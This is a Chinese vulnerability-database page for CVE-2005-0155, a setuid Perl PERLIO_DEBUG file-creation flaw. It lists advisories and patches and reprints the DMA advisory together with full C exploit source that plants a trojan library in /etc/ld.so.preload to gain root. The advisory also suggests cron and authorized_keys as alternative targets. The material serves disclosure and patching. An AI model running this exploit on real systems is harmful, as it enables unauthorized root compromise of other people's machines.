CVE-2005-0155
CVSS4.6
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:08:02
NMCOEPS    

[原文]The PerlIO implementation in Perl 5.8.0, when installed with setuid support (sperl), allows local users to create arbitrary files via the PERLIO_DEBUG variable.


[CNNVD]Perl SuidPerl缓存区溢出漏洞(CNNVD-200505-522)

        部分Perl脚本在处理PERLIO_DEBUG变量时存在问题,本地攻击者可以利用这个漏洞破坏系统文件或进行缓冲区溢出攻击。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:10404Race condition in the rmtree function in the File::Path module in Perl 5.6.1 and 5.8.4 sets read/write permissions for the world, which allo...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0155
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0155
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-522
(官方数据源) CNNVD

- 其它链接及资源

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=001056
(UNKNOWN)  CONECTIVA  CLSA-2006:1056
http://fedoranews.org/updates/FEDORA--.shtml
(UNKNOWN)  FEDORA  FLSA-2006:152845
http://marc.info/?l=bugtraq&m=110737149402683&w=2
(UNKNOWN)  BUGTRAQ  20050202 [USN-72-1] Perl vulnerabilities
http://marc.info/?l=full-disclosure&m=110779723332339&w=2
(UNKNOWN)  FULLDISC  20050207 DMA[2005-0131a] - 'Setuid Perl PERLIO_DEBUG root owned file creation'
http://support.avaya.com/elmodocs2/security/ASA-2006-163.htm
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2006-163.htm
http://www.digitalmunition.com/DMA%5B2005-0131a%5D.txt
(UNKNOWN)  MISC  http://www.digitalmunition.com/DMA[2005-0131a].txt
http://www.gentoo.org/security/en/glsa/glsa-200502-13.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200502-13
http://www.mandriva.com/security/advisories?name=MDKSA-2005:031
(UNKNOWN)  MANDRAKE  MDKSA-2005:031
http://www.redhat.com/support/errata/RHSA-2005-103.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2005:103
http://www.redhat.com/support/errata/RHSA-2005-105.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2005:105
http://www.securityfocus.com/bid/12426
(VENDOR_ADVISORY)  BID  12426
http://www.trustix.org/errata/2005/0003/
(PATCH)  TRUSTIX  2005-0003
http://xforce.iss.net/xforce/xfdb/19207
(VENDOR_ADVISORY)  XF  perl-perliodebug-file-overwrite(19207)

- 漏洞信息

Perl SuidPerl缓存区溢出漏洞
中危 资料不足
2005-05-02 00:00:00 2005-10-20 00:00:00
本地  
        部分Perl脚本在处理PERLIO_DEBUG变量时存在问题,本地攻击者可以利用这个漏洞破坏系统文件或进行缓冲区溢出攻击。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        IBM AIX 5.2
        IBM perl58x.tar.Z
        ftp://aix.software.ibm.com/aix/efixes/security/perl58x.tar
        IBM IY68464
        IBM AIX 5.3
        IBM perl58x.tar.Z
        ftp://aix.software.ibm.com/aix/efixes/security/perl58x.tar
        IBM IY68463
        SGI ProPack 3.0
        SGI patch10141.tar.gz
        ftp://patches.sgi.com/support/free/security/patches/ProPack/3/patch101 39.tar.gz
        Larry Wall Perl 5.8
        Fedora Legacy perl-5.8.0-90.0.12.legacy.i386.rpm
        Red Hat Linux 9:
        http://download.fedoralegacy.org/redhat/9/updates/i386/perl-5.8.0-90.0 .12.legacy.i386.rpm
        Fedora Legacy perl-5.8.3-17.4.legacy.i386.rpm
        Fedora Core 1:
        http://download.fedoralegacy.org/fedora/1/updates/i386/perl-5.8.3-17.4 .legacy.i386.rpm
        Fedora Legacy perl-CGI-2.81-90.0.12.legacy.i386.rpm
        Red Hat Linux 9:
        http://download.fedoralegacy.org/redhat/9/updates/i386/perl-CGI-2.81-9 0.0.12.legacy.i386.rpm
        Fedora Legacy perl-CPAN-1.61-90.0.12.legacy.i386.rpm
        Red Hat Linux 9:
        http://download.fedoralegacy.org/redhat/9/updates/i386/perl-CPAN-1.61- 90.0.12.legacy.i386.rpm
        Fedora Legacy perl-DB_File-1.804-90.0.12.legacy.i386.rpm
        Red Hat Linux 9:
        http://download.fedoralegacy.org/redhat/9/updates/i386/perl-DB_File-1. 804-90.0.12.legacy.i386.rpm
        Fedora Legacy perl-suidperl-5.8.0-90.0.12.legacy.i386.rpm
        Red Hat Linux 9:
        http://download.fedoralegacy.org/redhat/9/updates/i386/perl-suidperl-5 .8.0-90.0.12.legacy.i386.rpm
        Mandrake perl-5.8.0-14.4.C21mdk.i586.rpm
        Mandrake Corporate Server 2.1
        http://www.mandrakesecure.net/en/ftp.php
        Mandrake perl-5.8.0-14.4.C21mdk.x86_64.rpm
        Mandrake Corporate Server 2.1/x86_64
        http://www.mandrakesecure.net/en/ftp.php
        Mandrake perl-base-5.8.0-14.4.C21mdk.i586.rpm
        Mandrake Corporate Server 2.1
        http://www.mandrakesecure.net/en/ftp.php
        Mandrake perl-base-5.8.0-14.4.C21mdk.x86_64.rpm
        Mandrake Corporate Server 2.1/x86_64
        http://www.mandrakesecure.net/en/ftp.php
        Mandrake perl-devel-5.8.0-14.4.C21mdk.i586.rpm
        Mandrake Corporate Server 2.1
        http://www.mandrakesecure.net/en/ftp.php
        Mandrake perl-devel-5.8.0-14.4.C21mdk.x86_64.rpm
        Mandrake Corporate Server 2.1/x86_64
        http://www.mandrakesecure.net/en/ftp.php
        Mandrake perl-doc-5.8.0-14.4.C21mdk.i586.rpm
        Mandrake Corporate Server 2.1
        http://www.mandrakesecure.net/en/ftp.php
        Mandrake perl-doc-5.8.0-14.4.C21mdk.x86_64.rpm
        Mandrake Corporate Server 2.1/x86_64
        http://www.mandrakesecure.net/en/ftp.php
        SuSE perl-5.8.0-200.i586.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/perl-5.8.0-200.i5 86.rpm
        SuSE perl-5.8.0-201.i586.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/perl-5.8.0-201.i5 86.rpm
        Larry Wall Perl 5.8.1
        Fedora Legacy perl-5.8.3-17.4.legacy.i386.rpm
        Fedora Core 1:
        http://download.fedoralegacy.org/fedora/1/updates/i386/perl-5.8.3-17.4 .legacy.i386.rpm
        Fedora Legacy perl-5.8.3-19.3.legacy.i386.rpm
        Fedora Core 2:
        http://download.fedoralegacy.org/fedora/2/updates/i386/perl-5.8.3-19.3 .legacy.i386.rpm
        Fedora Legacy perl-suidperl-5.8.3-17.4.legacy.i386.rpm
        Fedora Core 1:
        http://download.fedoralegacy.org/fedora/1/updates/i386/perl-suidperl-5 .8.3-17.4.legacy.i386.rpm
        Fedora Legacy perl-suidperl-5.8.3-19.3.legacy.i386.rpm
        Fedora Core 2:
        http://download.fedoralegacy.org/fedora/2/updates/i386/perl-suidperl-5 .8.3-19.3.legacy.i386.rpm
        Mandrake perl-5.8.1-0.RC4.3.3.92mdk.amd64.rpm
        Mandrake Linux 9.2/amd64
        http://www.mandrakesecure.net/en/ftp.php
        Mandrake perl-5.8.1-0.RC4.3.3.92mdk.i586.rpm
        Mandrake Linux 9.2
        http://www.mandrakesecure.net/en/ftp.php
        Mandrake perl-base-5.8.1-0.RC4.3.3.92mdk.amd64.rpm
        Mandrake Linux 9.2/amd64
        http://www.mandrakesecure.net/en/ftp.php
        Mandrake perl-base-5.8.1-0.RC4.3.3.92mdk.i586.rpm
        Mandrake Linux 9.2
        http://www.mandrakesecure.net/en/ftp.php
        Mandrake perl-devel-5.8.1-0.RC4.3.3.92mdk.amd64.rpm
        Mandrake Linux 9.2/amd64
        http://www.mandrakesecure.net/en/ftp.php
        Mandrake perl-devel-5.8.1-0.RC4.3.3.92mdk.i586.rpm
        Mandrake Linux 9.2
        http://www.mandrakesecure.net/en/ftp.php
        Mandrake perl-doc-5.8.1-0.RC4.3.3.92mdk.amd64.rpm
        Mandrake Linux 9.2/amd64
        http://www.mandrakesecure.net/en/ftp.php
        Mandrake perl-doc-5

- 漏洞信息 (792)

Setuid perl PerlIO_Debug() root owned file creation (EDBID:792)
linux local
2005-02-07 Verified
0 Kevin Finisterre
N/A [点击下载]
/*
 * Copyright Kevin Finisterre 
 * 
 * ** DISCLAIMER ** I am in no way responsible for your stupidity.
 * ** DISCLAIMER ** I am in no way liable for any damages caused by compilation and or execution of this code.
 *
 * ** WARNING ** DO NOT RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
 * ** WARNING ** overwriting /etc/ld.so.preload can severly fuck up your box (or someone elses).
 * ** WARNING ** have a boot disk ready incase some thing goes wrong.
 *
 * Setuid Perl exploit by KF - kf_lists[at]secnetops[dot]com - 1/30/05
 *
 * this exploits a vulnerability in the PERLIO_DEBUG functionality
 * tested against sperl5.8.4 on Debian
 *
 * kfinisterre@jdam:~$ cc -o ex_perl ex_perl.c
 * kfinisterre@jdam:~$ ls -al /etc/ld.so.preload
 * ls: /etc/ld.so.preload: No such file or directory
 * kfinisterre@jdam:~$ ./ex_perl
 * sperl needs fd script
 * You should not call sperl directly; do you need to change a #! line
 * from sperl to perl?
 * kfinisterre@jdam:~$ su -
 * jdam:~# id
 * uid=0(root) gid=0(root) groups=0(root)
 * jdam:~# rm /etc/ld.so.preload
 *
 */


#define PRELOAD "/etc/ld.so.preload"
#include <stdio.h>
#include <strings.h>

int main(int *argc, char **argv)
{

        FILE *getuid;
        if(!(getuid = fopen("/tmp/getuid.c","w+"))) {
                printf("error opening file\n");
                exit(1);
        }
        
	fprintf(getuid, "int getuid(){return 0;}\n" );
        fclose(getuid);

        system("cc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc");

	putenv("PERLIO_DEBUG="PRELOAD);
        umask(001); // I'm rw-rw-rw james bitch!
        system("/usr/bin/sperl5.8.4");
        FILE *ld_so_preload;

        char preload[] = {
                "/tmp/getuid.so\n"
        };

        if(!(ld_so_preload = fopen(PRELOAD,"w+"))) {
                printf("error opening file\n");
                exit(1);
        }
        fwrite(preload,sizeof(preload)-1,1,ld_so_preload);
        fclose(ld_so_preload);
}

// milw0rm.com [2005-02-07]
		

- 漏洞信息 (F36090)

ex_perl.c (PacketStormID:F36090)
2005-02-22 00:00:00
Kevin Finisterre  digitalmunition.com
exploit,local,root,perl
CVE-2005-0155
[点击下载]

Local root exploit for the PerlIO package that makes use of a flaw where manipulation of the filename set in PERLIO_DEBUG allows for local root compromise when using setuid perl.

- 漏洞信息 (F36089)

DMA-2005-0131a.txt (PacketStormID:F36089)
2005-02-22 00:00:00
Kevin Finisterre  digitalmunition.com
advisory,local,root,perl
CVE-2005-0155
[点击下载]

The PerlIO package for Perl 5.8.0 suffers from a flaw where manipulation of the filename set in PERLIO_DEBUG allows for local root compromise when using setuid perl.

DMA[2005-0131a] - 'Setuid Perl PERLIO_DEBUG root owned file creation'
Author: Kevin Finisterre
Vendor: http://dev.perl.org/
Product: 'Perl 5.8.x - sperl'
References: (CAN-2005-0155)
http://www.digitalmunition.com/DMA[2005-0131a].txt
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0155
https://rt.perl.org/rt3/Ticket/Display.html?id=33990 (guest/guest)
http://www.mail-archive.com/perl5-changes@perl.org/msg10733.html
http://www.mail-archive.com/perl5-changes@perl.org/msg10734.html
http://www.mail-archive.com/perl5-changes@perl.org/msg10736.html
http://www.mail-archive.com/perl5-changes@perl.org/msg10737.html

Description: 
Perl is a stable, cross platform programming language. It is used for mission critical projects 
in the public and private sectors and is widely used to program web applications of all needs.

In the July 18, 2002 highlights for Perl 5.8.0 there was a 'New IO Implementation' added called
PerlIO. The new PerlIO implementation was described as both a portable stdio implementation
(at the source code level) and a flexible new framework for richer I/O behaviours. 

As an attacker I would definately say that PerlIO has some rich behavior. Two vulnerabilities 
were located in the PerlIO package that can allow an attacker to take root on a machine that 
makes use of setuid perl aka sperl. The first vulnerability will be outlined in this document, 
and details on the second vulnerability will be explained in DMA[2005-0131b].

Perl provides debug access to PerlIO via an environment variable known as PERLIO_DEBUG. The perl
documentaion tells us that if PERLIO_DEBUG is set to the name of a file or device then certain 
operations of PerlIO sub-system will be logged to that file in append mode. If the file does not
exist then it will be created. This vulnerability really does not present itself unless perl is 
installed with setuid support on the machine in question. If setuid is enabled an attacker has
the opportunity to arbitrarily create root owned files. With a little help from umask() files can
be created with root ownership AND world writable permissions. This behavior can also be exploited 
via setuid helper or wrapper scripts that call perl scripts (see the Debian game mooix). 

kfinisterre@jdam:~$ ls -al /usr/bin/sperl5.8.4
-rwsr-xr-x  1 root root 63808 2004-12-11 18:32 /usr/bin/sperl5.8.4
kfinisterre@jdam:~$ export PERLIO_DEBUG=/tmp/aaa
kfinisterre@jdam:~$ umask 001
kfinisterre@jdam:~$ /usr/bin/sperl5.8.4
sperl needs fd script
You should not call sperl directly; do you need to change a #! line
from sperl to perl?
kfinisterre@jdam:~$ ls -al /tmp/aaa
-rw-rw-rw-  1 root kfinisterre 1403 2005-01-30 02:34 /tmp/aaa

At this point the game is pretty much over. Since the file is world writable the attacker can add
any content he or she desires to the file that was created. Charles Stevenson suggested that a file
could be written to /etc/crond.d/xxxx which would allow an attacker to control the machine with the next 
run of cron. I considered a few alternatives like writing to roots crontab, making an sshd root
authorized_key file, as well as a few others. In my example exploit I took a more immediate and risky
route by writing to /etc/ld.so.preload and providing a trojan.so that always returns 0 for getuid(). 

kfinisterre@jdam:~$ cc -o ex_perl ex_perl.c
kfinisterre@jdam:~$ ls -al /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory
kfinisterre@jdam:~$ ./ex_perl
sperl needs fd script
You should not call sperl directly; do you need to change a #! line
from sperl to perl?
kfinisterre@jdam:~$ su -
jdam:~# id
uid=0(root) gid=0(root) groups=0(root)
jdam:~# rm /etc/ld.so.preload

The following patch for this bug was provided by Mandrake care of the vendor-sec list. This patch 
also fixes the bug that is described in DMA[2005-0131b].

Index: perlio.c
===================================================================
--- perlio.c    (revision 4342)
+++ perlio.c    (revision 4346)
@@ -454,7 +454,7 @@
     va_list ap;
     dSYS;
     va_start(ap, fmt);
-    if (!dbg) {
+    if (!dbg && !PL_tainting && PL_uid == PL_euid && PL_gid == PL_egid) {
        char *s = PerlEnv_getenv("PERLIO_DEBUG");
        if (s && *s)
            dbg = PerlLIO_open3(s, O_WRONLY | O_CREAT | O_APPEND, 0666);
@@ -471,7 +471,7 @@
        s = CopFILE(PL_curcop);
        if (!s)
            s = "(none)";
-       sprintf(buffer, "%s:%" IVdf " ", s, (IV) CopLINE(PL_curcop));
+       sprintf(buffer, "%.40s:%" IVdf " ", s, (IV) CopLINE(PL_curcop));
        len = strlen(buffer);
        vsprintf(buffer+len, fmt, ap);
        PerlLIO_write(dbg, buffer, strlen(buffer));

an alternate patch was also provided. This patch adds some indication of patching to 'perl -V'

--- perlio.c.orig	Fri Sep 10 08:06:52 2004
+++ perlio.c	Tue Feb  1 22:17:45 2005
@@ -471,7 +471,7 @@ PerlIO_debug(const char *fmt, ...)
 	s = CopFILE(PL_curcop);
 	if (!s)
 	    s = "(none)";
-	sprintf(buffer, "%s:%" IVdf " ", s, (IV) CopLINE(PL_curcop));
+	sprintf(buffer, "%.40s:%" IVdf " ", s, (IV) CopLINE(PL_curcop));
 	len = strlen(buffer);
 	vsprintf(buffer+len, fmt, ap);
 	PerlLIO_write(dbg, buffer, strlen(buffer));
--- patchlevel.h.orig	Sat Nov 27 17:18:15 2004
+++ patchlevel.h	Tue Feb  1 22:19:59 2005
@@ -123,3 +123,4 @@ hunk.
+	,"SUIDPERLIO1 - fix PERLIO_DEBUG buffer overflow (CAN-2005-0156)"
 	,NULL
 };

This bug has been successfully exploited on: 
Debian 3.1 
Ubuntu 4.10
Redhat 8.0

This is basic timeline associated with this bug. 

01/30/2005 09:29 AM - Mail to larry wall, perlbug, vendor-sec et all 
01/31/2005 04:25 AM - Rafael Garcia-Suarez disabed PERLIO_DEBUG in sperl
01/31/2005 08:31 AM - perl #33990] [RESOLVED] 
01/31/2005 11:15 AM - perl-5.8.6-bug33990.patch passed on from Mandrake cvs
02/02/2005 05:20 PM - Alternate patch provided nick@ccl4.org

-KF


    

- 漏洞信息

13451
Perl PERLIO_DEBUG Arbitrary File Overwrite
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-02-02 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Perl SuidPerl Multiple Local Vulnerabilities
Unknown 12426
No Yes
2005-02-02 12:00:00 2006-08-31 11:33:00
These vulnerabilities were announced in a vendor advisory.

- 受影响的程序版本

Ubuntu Ubuntu Linux 4.1 ppc
Ubuntu Ubuntu Linux 4.1 ia64
Ubuntu Ubuntu Linux 4.1 ia32
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 1.5
Trustix Secure Enterprise Linux 2.0
SGI ProPack 3.0
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0 i386
S.u.S.E. Linux 8.0
RedHat Linux 9.0 i386
RedHat Linux 7.3 i386
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Desktop 4.0
RedHat Desktop 3.0
Red Hat Fedora Core3
Red Hat Fedora Core2
Red Hat Fedora Core1
Red Hat Enterprise Linux AS 4
Red Hat Enterprise Linux AS 3
Larry Wall Perl 5.8.4 -5
Larry Wall Perl 5.8.4 -4
Larry Wall Perl 5.8.4 -3
Larry Wall Perl 5.8.4 -2.3
Larry Wall Perl 5.8.4 -2
Larry Wall Perl 5.8.4 -1
Larry Wall Perl 5.8.4
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 10.1 x86_64
+ Mandriva Linux Mandrake 10.1
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
Larry Wall Perl 5.8.3
+ Gentoo Linux
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Larry Wall Perl 5.8.1
Larry Wall Perl 5.8
+ Turbolinux Home
+ Turbolinux Turbolinux Desktop 10.0
IBM AIX 5.3
IBM AIX 5.2
Conectiva Linux 10.0
Avaya Messaging Storage Server MM3.0

- 漏洞讨论

SuidPerl is reported prone to multiple vulnerabilities. The following individual issues are reported:

- the 'PERLIO_DEBUG' SuidPerl environment variable may be employed to corrupt arbitrary files. A local unprivileged attacker may exploit this vulnerability to corrupt arbitrary files with superuser privileges. This may ultimately lead to a denial of service for legitimate users or to privilege escalation.

- SuidPerl is prone to a local buffer-overflow vulnerability as well. A local attacker may exploit this buffer-overflow vulnerability to gain superuser privileges. This issue is also exploited through the 'PERLIO_DEBUG' variable.

- 漏洞利用

Kevin Finisterre <kf@digitalmunition.com> has provided the following proof-of-concept exploits:

- 解决方案

Please see the referenced advisories for more information.


IBM AIX 5.2

IBM AIX 5.3

SGI ProPack 3.0

Larry Wall Perl 5.8

Larry Wall Perl 5.8.1

Larry Wall Perl 5.8.3

Larry Wall Perl 5.8.4

Larry Wall Perl 5.8.4 -5

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站